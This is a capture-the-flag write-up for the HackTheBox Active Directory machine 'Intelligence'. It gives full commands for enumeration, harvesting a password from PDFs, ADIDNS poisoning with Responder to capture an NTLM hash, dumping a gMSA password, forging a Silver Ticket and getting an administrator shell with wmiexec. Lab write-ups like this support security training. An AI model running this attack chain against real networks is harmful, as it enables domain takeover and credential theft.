Intelligence
Leveraged gMSA misconfiguration of a user to forge a Silver Ticket to become a Domain Admin.
Summary
15 ports open including SMB, LDAP, Kerberos, RPC — confirmed Active Directory Domain Controller.
Extracted usernames from PDF metadata.
Used a date-based filename wordlist to download documents and uncover default password.
Validated credentials with
crackmapexecand found access to SMB shares.Discovered a PowerShell script scheduled to ping
web*DNS entries — enabled ADIDNS attack.Created a fake DNS record pointing to attacker machine and captured NTLM hash with Responder.
Cracked the NTLMv2 hash to get credentials for a high-privileged user.
BloodHound revealed Ted.Graves had
ReadGMSAPasswordonsvc_intaccount.Dumped gMSA password and created a Silver Ticket impersonating Administrator.
Used Silver Ticket with
wmiexec.pyto get Administrator shell.
🧵 Let's Unpack
🔍Enumeration
Nmap Full Port Scan
sudo nmap -sC -sV -A -T5 -p- 10.10.10.248The host is a Windows Domain Controller. Services of interest:
88/tcp open kerberos-sec
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open http Microsoft HTTPAPI
9389/tcp open mc-nmfenum4linux
enum4linux -a 10.10.10.248We confirmed guest access but got limited information.
📁 File-Based Enumeration
We brute-forced document paths with a custom date wordlist script:
# Generate filenames like 2020-06-01-upload.pdf
python dateGen.py 2020 2021 0 "-"# Prepare gobuster results
cat gobuster80 | awk '{split($0,a," "); print a[1]}' | awk '{print "http://10.10.10.248/documents"$0}' > docs.txt
wget -i docs.txtFound default creds inside one PDF:
Username: Tiffany.Molina
Password: NewIntelligenceCorpUser9876🔐 SMB Access
sudo crackmapexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htbConfirmed valid credentials.
smbmap -u "Tiffany.Molina" -p "NewIntelligenceCorpUser9876" -H 10.10.10.248
smbclient -U Tiffany.Molina //10.10.10.248/ITFound a file named downdetector.ps1 — a scheduled script that monitors web DNS records and emails status updates to Ted.Graves@intelligence.htb using authenticated web requests.
🧨 Exploiting ADIDNS via Responder
Authenticated users can modify DNS via dnstool.py:
./dnstool.py -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248 -a add -r webl -d 10.10.14.13 -t ARun Responder to intercept NTLM hash:
responder -I tun0Captured:
Username: Ted.Graves
NTLMv2 Hash: <hash>🔑 Credential Cracking & BloodHound
Successfully cracked hash (or obtained cleartext creds):
Username: Ted.Graves
Password: Mr.TeddyUsed bloodhound-python for enumeration:
bloodhound-python -d intelligence.htb -u Ted.Graves -p Mr.Teddy -ns 10.10.10.248 -c AllBloodHound revealed:
🧪 Ted.Graves ∈ ITSupport → has ReadGMSAPassword on svc_int
📦 Dump gMSA Password and Generate Silver Ticket
# Dumping gMSA password
./gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -l 10.10.10.248Output:
svc_int$:aes256-cts-hmac-sha1-96:285962204a4f54a092182cc51512bda5137de5b33becfd27797d079ba440e6d5
svc_int$:aes128-cts-hmac-sha1-96:cc50179e1ce82827a22ef0ad4fab3bd9# Generate Silver Ticket as Administrator
Impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :285962204a4f54a092182cc51512bda5137de5b33becfd27797d079ba440e6d5🖥️ Administrator Shell via Silver Ticket
export KRB5CCNAME=Administrator.ccache
echo "10.10.10.248 dc.intelligence.htb" | sudo tee -a /etc/hosts
# Shell!
wmiexec.py -k -no-pass dc.intelligence.htbLast updated